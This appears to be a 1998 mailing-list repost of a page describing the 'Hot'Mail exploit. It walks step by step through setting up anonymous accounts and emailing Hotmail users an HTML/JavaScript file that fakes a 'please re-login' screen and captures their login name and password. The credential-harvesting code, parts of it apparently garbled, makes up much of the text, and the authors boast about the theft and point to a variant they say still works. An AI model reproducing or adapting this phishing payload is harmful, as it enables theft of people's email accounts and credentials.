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hotmail users on BurmaNet...

 This page demonstrates how we used the "Hot"Mail exploit with minimal 
resources to steal passwords from Hotmail users. Our goal was to show 
that using only the items listed below, we could steal a victim's 
Hotmail password and remain anonymous.  The following version of the 
exploit has been patched by Hotmail as  of Monday, August 25, 1998.  
Click here to see a variation of the "Hot"Mail exploit that works 
despite Hotmail's fix.


      1 Computer with Internet Access 
      1 Netscape Mail (or equivalent e-mail program) 
      1 Notepad (or equivalent text editor) 

 STEP 1:
 We visited hotmail.com and registered for a free e-mail account. We did 
not have to enter valid contact information during the registration 

 STEP 2:
 We visited Geocities.com and registered for a free homepage. We chose 
the username ybwc. We did not have to enter valid contact information 
during the registration process, except for an e-mail address. We used 
the e-mail address from step 1. As part of our registration, we were 
given a new free email account from Geocities (ybwc@xxxxxxxxxxxxx). 

 STEP 3:
 We opened our notepad and typed in the following text, which we then 
saved as message.htm. Line 17 contains our Geocities username (ybwc), 
from step 2.

      <p>"Go where you want today" - Blue Adept</p>
      function getmess(){
      return "<table border=0 cellpadding=5 cellspacing=5 width=508
      height=90%>" +
      "<tr valign=middle>" +
      "<th colspan=2>" +
      "<font face=\"Arial, Helvetica\" size=\"5\">" +
      "We're Sorry, We Cannot<br>Process Your Request" + 
      "</font></th></tr>" +
      "<tr valign=middle><td align=center>" +
      "<font face=\"Arial, Helvetica\"
      size=\"3\">Reason:&nbsp;</font>" + 
      "<font face=\"Arial, Helvetica\" size=\"3\"
      color=\"#ff0000\"><b>Time expired. Please
      re-login.</b></font><br>" + 
      "<font face=\"Arial, Helvetica\" size=\"2\"><a
      href=\"http://www.hotmail.com/errormsg.html\";>(Get more info
      regarding error messages here)</a></font>" +
      "</td></tr>" +
      "<tr valign=\"middle\"><td align=\"center\">" +
      target=\"_top\">" +
      "<INPUT TYPE=\"hidden\" NAME=\"next-url\"
      VALUE=\"http://www.hotmail.com\";>" +
      "<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail
      Password\">" +
      "<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
      "<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login
      Name:</font><br><input type=\"text\" name=\"login\"
      size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial,
      Helvetica\" size=\"2\">Password:</font><br><input
      type=\"password\" name=\"passwd\" size=\"16\"
      maxlength=\"16\">&nbsp;<input type=\"submit\"
      value=\"Enter\"></td><tr>" +
      "</table></form></td></tr>" +
      "<tr valign=middle><th colspan=2 align=center>" +
      "<font face=\"Arial, Helvetica\" size=\"3\">" +
      "Return to <a href=\"http://welcome.to/www.hotmail.com\";
      target=\"_parent\">Hotmail's Homepage</a>." +
      "</font></th></tr></table>" +
      "<p><img src=\"\"; width=189
      height=16 border=0 alt=\"Copyright 1996-1997\">";




 STEP 4: We composed a new e-mail message to our (example) victim,
 victim@xxxxxxxxxxxx We inserted the file message.htm into the e-mail 
message and then sent it. 

 STEP 5: We waited for our victim to check his Hotmail account. Shortly 
after he viewed our message, we checked our Geocities email. We received 
an e-mail message from Geocities that listed the ip address, username, 
and password of the Hotmail user victim@xxxxxxxxxxx 

because we can!!!!

Get Your Private, Free Email at http://www.hotmail.com